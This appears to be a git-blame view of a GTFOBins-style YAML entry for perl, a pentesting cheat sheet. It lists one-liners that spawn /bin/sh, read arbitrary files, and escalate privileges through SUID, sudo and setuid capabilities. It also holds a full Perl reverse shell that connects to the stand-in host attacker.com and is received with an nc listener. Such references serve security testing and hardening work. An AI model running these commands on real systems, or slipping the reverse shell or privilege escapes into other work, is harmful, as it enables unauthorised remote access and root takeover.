2018-05-21 21:14:41 +02:00
|
|
|
---
|
|
|
|
functions:
|
2018-10-05 19:55:38 +02:00
|
|
|
shell:
|
2018-07-16 15:01:50 +02:00
|
|
|
- code: perl -e 'exec "/bin/sh";'
|
2021-04-26 16:11:44 +02:00
|
|
|
file-read:
|
|
|
|
- code: |
|
|
|
|
LFILE=file_to_read
|
|
|
|
perl -ne print $LFILE
|
2018-10-05 19:55:38 +02:00
|
|
|
reverse-shell:
|
2018-07-16 15:01:50 +02:00
|
|
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
|
|
|
code: |
|
|
|
|
export RHOST=attacker.com
|
|
|
|
export RPORT=12345
|
|
|
|
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
2018-10-05 19:55:38 +02:00
|
|
|
suid:
|
2018-07-16 15:01:50 +02:00
|
|
|
- code: ./perl -e 'exec "/bin/sh";'
|
2018-10-05 19:55:38 +02:00
|
|
|
sudo:
|
2018-07-16 15:01:50 +02:00
|
|
|
- code: sudo perl -e 'exec "/bin/sh";'
|
2018-10-05 19:55:38 +02:00
|
|
|
capabilities:
|
2018-09-12 22:57:04 +02:00
|
|
|
- code: ./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
|
2018-05-25 01:10:39 +02:00
|
|
|
---
|